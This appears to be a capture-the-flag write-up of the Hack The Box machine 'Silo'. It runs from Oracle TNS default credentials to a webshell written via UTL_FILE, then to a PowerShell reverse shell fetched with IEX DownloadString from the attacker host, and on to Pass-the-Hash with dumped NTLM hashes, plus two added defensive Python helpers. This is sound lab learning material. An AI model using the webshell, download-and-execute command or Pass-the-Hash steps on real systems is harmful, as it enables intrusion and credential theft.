Silo

Summary

I really liked this machine because it gave me the chance to play with an Oracle TNS database for the first time and to learn and use some new tools along the way. To start off, I will use the database to upload a webshell to the web server, which will get me a PowerShell shell. For privilege escalation (privesc), which is the first time I have seen something like this in an HTB box, I will work with a memory dump file to extract a hash that I can use with Pass-the-Hash to get a shell as Administrator. There is also an unintended way to read the root flag before even getting a foothold; I will cover it in Beyond Root.

Enumeration

As always, I begin with the enumeration of ports using nmap:

nmap -p- 10.10.10.82 --min-rate 5000 -oA nmap/silo -v

Scanning 10.10.10.82 [65535 ports]
Discovered open port 80/tcp on 10.10.10.82
Discovered open port 139/tcp on 10.10.10.82
Discovered open port 8080/tcp on 10.10.10.82
Discovered open port 445/tcp on 10.10.10.82
Discovered open port 135/tcp on 10.10.10.82
Discovered open port 49152/tcp on 10.10.10.82
Discovered open port 49155/tcp on 10.10.10.82
Discovered open port 49162/tcp on 10.10.10.82
Discovered open port 49153/tcp on 10.10.10.82
Discovered open port 49160/tcp on 10.10.10.82
Discovered open port 49161/tcp on 10.10.10.82
Discovered open port 47001/tcp on 10.10.10.82
Discovered open port 5985/tcp on 10.10.10.82
Discovered open port 49154/tcp on 10.10.10.82
Discovered open port 1521/tcp on 10.10.10.82
Discovered open port 49159/tcp on 10.10.10.82
Completed Connect Scan at 06:42, 12.07s elapsed (65535 total ports)
Nmap scan report for 10.10.10.82
Host is up (0.029s latency).
Not shown: 65519 closed tcp ports (conn-refused)
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1521/tcp  open  oracle
5985/tcp  open  wsman
8080/tcp  open  http-proxy
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49159/tcp open  unknown
49160/tcp open  unknown
49161/tcp open  unknown
49162/tcp open  unknown

nmap -sCV 10.10.10.82 -oA nmap/silo_scripts -v
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
8080/tcp  open  http         Oracle XML DB Enterprise Edition httpd
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=XDB
|_http-title: 401 Unauthorized
|_http-server-header: Oracle XML DB/Oracle Database
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-time:
|   date: 2023-12-31T11:48:09
|_  start_date: 2023-12-31T11:18:37
| smb2-security-mode:
|   3:0:2:
|_    Message signing enabled but not required

I like to check the smaller attack surfaces first and rule them out, so that when I move on to a large one I can be flexible with my time. Web applications, for example, offer a much larger attack surface than most other services. So I will start with RPC:

➜  rpcclient -U '' -N 10.10.10.82
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED

I can't access RPC so I will be moving on to SMB:

➜  ~ smbclient -L //10.10.10.82/
Password for [WORKGROUP\ichyaboy]:
session setup failed: NT_STATUS_ACCESS_DENIED

The same goes for the SMB server. I will keep in mind that if I get any credentials, I can come back and retest these two services.

I went straight to the web app on port 80, where I found nothing useful except the default page of an IIS server (version 8.5). I will fuzz the web app to see if there is anything hidden:

➜  gobuster dir -u http://10.10.10.82 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  --no-error

I didn't find anything, so I will move on to the next web app, on port 8080. This one immediately asks for a login before showing any page. I tried some default credentials without success, so I am leaving this web app aside until I find some creds; maybe then I can log in.

Now I went for the Oracle TNS DB. After reading about this type of database and exploring multiple attack paths, I found this article on Hacktricks (https://book.hacktricks.xyz/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener) useful.

First I will be enumerating the SID using a tool called odat.

➜  odat python3 odat.py sidguesser -s 10.10.10.82 -p 1521
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue...       # | ETA:  00:00:00
100% |#######################################| Time: 00:00:51

XE is a valid SID.

The SID (Service Identifier) is essentially the database name. Depending on the install, there may be one or more default SIDs, or even a completely custom SID defined by the DBA.

Now I will try to get some valid credentials using the passwordguesser argument with odat.

➜  python3 odat.py passwordguesser -d XE -s 10.10.10.82
[+] Valid credentials found: scott/tiger.

Setting Sqlplus up

Since I have valid credentials, I will try to connect to the DB. I will be using sqlplus to connect to the DB, but first, I need to set it up. Following 0xdf's steps, I will need to download:

  • instantclient-basic-linux.x64-12.2.0.1.0.zip

  • instantclient-sdk-linux.x64-12.2.0.1.0.zip

  • instantclient-sqlplus-linux.x64-12.2.0.1.0.zip

Unzip them into the same directory, then open your shell's rc file (in my case zsh) and add these lines:

alias sqlplus='/opt/instantclient_12_2/sqlplus'
export PATH=/opt/instantclient_12_2:$PATH
export SQLPATH=/opt/instantclient_12_2
export TNS_ADMIN=/opt/instantclient_12_2
export LD_LIBRARY_PATH=/opt/instantclient_12_2:$LD_LIBRARY_PATH
export ORACLE_HOME=/opt/instantclient_12_2

Then you will be ready to go.

Shell as defaultapppool

➜  sqlplus  scott/tiger@10.10.10.82:1521/XE as sysdba

SQL*Plus: Release 12.2.0.1.0 Production on Sun Dec 31 08:41:15 2023

Copyright (c) 1982, 2016, Oracle.  All rights reserved.


Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production

SQL>

Connecting "as sysdba" gave me system (SYSDBA) privileges, which make it easy to read through the database and to change the database configuration itself. I can check my user's roles with:

SQL> select * from user_role_privs;

I can see that I have SYS privileges on the DB, so I will write a PL/SQL block that uses the UTL_FILE package to read files:

SQL> declare
    f utl_file.file_type;
    s varchar(200);
begin
    f:= utl_file.fopen('/inetpub/wwwroot','iisstart.htm','R');
    utl_file.get_line(f,s);
    utl_file.fclose(f);
    dbms_output.put_line(s);
end;
/

PL/SQL procedure successfully completed.

The block compiled and ran successfully, but I can't see its output, so I will enable the serveroutput option:

SQL> set serveroutput ON

Then I rerun the block by entering "/", which re-executes the contents of the SQL*Plus buffer:

SQL> /
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

PL/SQL procedure successfully completed.

And now I can read files. Next I will try to write a file into the root directory of the web app:

SQL> declare
    f utl_file.file_type;
    s varchar(5000) := 'ichyaboy was here';
begin
    f:= utl_file.fopen('/inetpub/wwwroot','test.htm','W');
    utl_file.put_line(f,s);
    utl_file.fclose(f);
end;
/
PL/SQL procedure successfully completed.
➜ curl http://10.10.10.82/test.htm
ichyaboy was here

Time to go for a webshell. I will use the cmd.aspx webshell from /usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx, but with the styling lines and some other unnecessary lines removed, so it looks like this:

<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>
SQL> declare
    f utl_file.file_type;
    s varchar(5000) := '<%@ Page Language="C#" Debug="true" Trace="false" %><%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script Language="c#" runat="server">void Page_Load(object sender, EventArgs e){}string ExcuteCmd(string arg){ProcessStartInfo psi = new ProcessStartInfo();psi.FileName = "cmd.exe";psi.Arguments = "/c "+arg;psi.RedirectStandardOutput = true;psi.UseShellExecute = false;Process p = Process.Start(psi);StreamReader stmrdr = p.StandardOutput;string s = stmrdr.ReadToEnd();stmrdr.Close();return s;}void cmdExe_Click(object sender, System.EventArgs e){Response.Write("<pre>");Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));Response.Write("</pre>");}</script><body ><form id="cmd" method="post" runat="server"><asp:TextBox id="txtArg" runat="server" Width="250px"></asp:TextBox><asp:Button id="testing" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button><asp:Label id="lblText" runat="server">Command:</asp:Label></form></body></HTML>';
begin
    f:= utl_file.fopen('/inetpub/wwwroot','givemeshell.aspx','W');
    utl_file.put_line(f,s);
    utl_file.fclose(f);
end;
/
PL/SQL procedure successfully completed.

By accessing http://10.10.10.82/givemeshell.aspx, I can run commands easily from the webshell. However, this shell is not very flexible, so I will go for a reverse shell. I will use /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1, rename it to shell.ps1, serve it with a Python HTTP server, and listen on port 9001.

From the webshell, I will run:

powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.14/shell.ps1')"
➜  www python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.82 - - [31/Dec/2023 09:09:09] "GET /shell.ps1 HTTP/1.1" 200 -

➜  ~ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.82] 49197
Windows PowerShell running as user SILO$ on SILO
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>
PS C:\users\Phineas\Desktop> type user.txt
a48e****************************

Privesc

Beside the user.txt file on Phineas's Desktop there is a file called "Oracle issue.txt":

PS C:\users\Phineas\Desktop> cat "Oracle issue.txt"
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):

Dropbox link provided to vendor (and password under separate cover).

Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0

link password:
?%Hm8646uC$

I had trouble using the password because I didn't realize that the first character was wrong due to an encoding issue. So, I will transfer the whole text as base64 to my host machine and decode it there to see what the actual password is:

PS C:\users\Phineas\Desktop> $fc = Get-Content "Oracle issue.txt"            
PS C:\users\Phineas\Desktop> $fe = [System.Text.Encoding]::UTF8.GetBytes($fc)
PS C:\users\Phineas\Desktop> [System.Convert]::ToBase64String($fe)

U3VwcG9ydCB2ZW5kb3IgZW5nYWdlZCB0byB0cm91Ymxlc2hvb3QgV2luZG93cyAvIE9yYWNsZSBwZXJmb3JtYW5jZSBpc3N1ZSAoZnVsbCBtZW1vcnkgZHVtcCByZXF1ZXN0ZWQpOiAgRHJvcGJveCBsaW5rIHByb3ZpZGVkIHRvIHZlbmRvciAoYW5kIHBhc3N3b3JkIHVuZGVyIHNlcGFyYXRlIGNvdmVyKS4gIERyb3Bib3ggbGluayAgaHR0cHM6Ly93d3cuZHJvcGJveC5jb20vc2gvNjlza3J5emZzemI3ZWxxL0FBRFpuUUViYnFEb0lmNUwyZDBQQnhFTmE/ZGw9MCAgbGluayBwYXNzd29yZDogwqMlSG04NjQ2dUMk
➜  cat Oracle\ issue.txt
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):

Dropbox link provided to vendor (and password under separate cover).

Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0

link password:
£%Hm8646uC$
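
To see exactly what went wrong with the first character, here is an added Python example (not part of the original writeup) that decodes the tail of the base64 string produced above, lists every non-ASCII character with its code point, and shows how the same bytes look under the wrong code page. The constant B64_TAIL is the last 36 characters of the blob printed by the PowerShell command, i.e. the "link password:" line.

```python
import base64

# Last 36 characters of the base64 blob the writeup produced on the target:
# they encode the "link password: ..." line of "Oracle issue.txt".
B64_TAIL = "bGluayBwYXNzd29yZDogwqMlSG04NjQ2dUMk"


def decode_b64_text(blob: str, encoding: str = "utf-8") -> str:
    """Decode a base64 blob and interpret the bytes with the given encoding."""
    return base64.b64decode(blob).decode(encoding)


def non_ascii_chars(text: str) -> list:
    """Return (index, char, 'U+XXXX') for every character outside 7-bit ASCII.

    These are the characters a console using a different code page will
    mangle (for example render as '?'), so they are the first thing to
    check when a copied password keeps getting rejected.
    """
    return [(i, ch, f"U+{ord(ch):04X}") for i, ch in enumerate(text) if ord(ch) > 0x7F]


def password_from_note(text: str) -> str:
    """Extract the value that follows 'link password:' in the note."""
    return text.split("link password:", 1)[1].strip()


def as_seen_by(blob: str, codec: str) -> str:
    """Decode the same raw bytes with a different codec to reproduce mojibake."""
    return base64.b64decode(blob).decode(codec, errors="replace")


def ascii_view(text: str) -> str:
    """What a pure-ASCII output channel shows: each non-ASCII char becomes '?'."""
    return text.encode("ascii", errors="replace").decode("ascii")


if __name__ == "__main__":
    text = decode_b64_text(B64_TAIL)
    print("utf-8   :", text)                       # correct: £%Hm8646uC$
    print("latin-1 :", as_seen_by(B64_TAIL, "latin-1"))  # two-byte UTF-8 sequence read as Â£
    print("ascii   :", ascii_view(text))           # the '?' seen in the remote shell
    print("suspect :", non_ascii_chars(text))      # [(15, '£', 'U+00A3')]
    print("password:", password_from_note(text))
```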

After unzipping the downloaded archive:

➜   file SILO-20180105-221806.dmp
SILO-20180105-221806.dmp: MS Windows 64bit crash dump, version 15.9600, 2 processors, DumpType (0x1), 261996 pages

It's a memory dump file, so I will use Volatility to analyze it, but first I need a profile:

➜  ./volatility kdbgscan -f SILO-20180105-221806.dmp

Instantiating KDBG using: Unnamed AS Win2012R2x64_18340 (6.3.9601 64bit)

./volatility -f  SILO-20180105-221806.dmp --profile Win2012R2x64 hashdump
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
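
As an added example (not from the writeup), the following Python parses the pwdump-format lines above and flags what a defender should act on: the Guest NT hash is the well-known hash of the empty string (a blank password), and the built-in Administrator hash (RID 500) is recoverable from a dump that was shared with a third party, so it needs rotating. The sample lines are copied from the hashdump output above; pwdump lines carry no account-status flag, so a "blank password" hit still has to be checked against whether the account is disabled.

```python
import re

# Well-known constants: the LM field stored when LM hashing is disabled, and
# the NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

BLANK_PASSWORD = "blank password (NT hash of empty string)"
LM_PRESENT = "LM hash stored (legacy, weak)"
ADMIN_HASH_EXPOSED = "RID 500 Administrator hash exposed in dump"

# The three lines Volatility's hashdump printed for this box.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
"""

# user:rid:lmhash:nthash::: with 32-hex-digit hashes
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


def is_pwdump_line(line: str) -> bool:
    return LINE_RE.match(line.strip()) is not None


def parse_pwdump(text: str) -> list:
    """Parse pwdump lines into dicts; reject anything that is not pwdump format."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = LINE_RE.match(line.strip())
        if not m:
            raise ValueError(f"line {lineno}: not pwdump format: {line!r}")
        user, rid, lm, nt = m.groups()
        entries.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return entries


def audit(entries: list) -> list:
    """Return (user, finding) pairs; the dump has no 'disabled' flag, verify separately."""
    findings = []
    for e in entries:
        if e["nt"] == EMPTY_NT:
            findings.append((e["user"], BLANK_PASSWORD))
        if e["lm"] != EMPTY_LM:
            findings.append((e["user"], LM_PRESENT))
        if e["rid"] == 500 and e["nt"] != EMPTY_NT:
            findings.append((e["user"], ADMIN_HASH_EXPOSED))
    return findings
```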

Now I will use psexec from Impacket with the Administrator hash to get a shell as Administrator:

➜ impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 administrator@10.10.10.82

C:\Windows\system32> whoami
nt authority\system
C:\Users\Administrator\Desktop> type root.txt
fb6b****************************

Beyond Root

Here I will show how root.txt could have been read directly from the Oracle DB, which is easy: I just reuse the PL/SQL block I wrote to read files and point it at the root.txt path.

SQL> declare
    f utl_file.file_type;
    s varchar(200);
begin
    f:= utl_file.fopen('/Users/Administrator/Desktop','root.txt','R');
    utl_file.get_line(f,s);
    utl_file.fclose(f);
    dbms_output.put_line(s);
end;
/
fb6b****************************

PL/SQL procedure successfully completed.
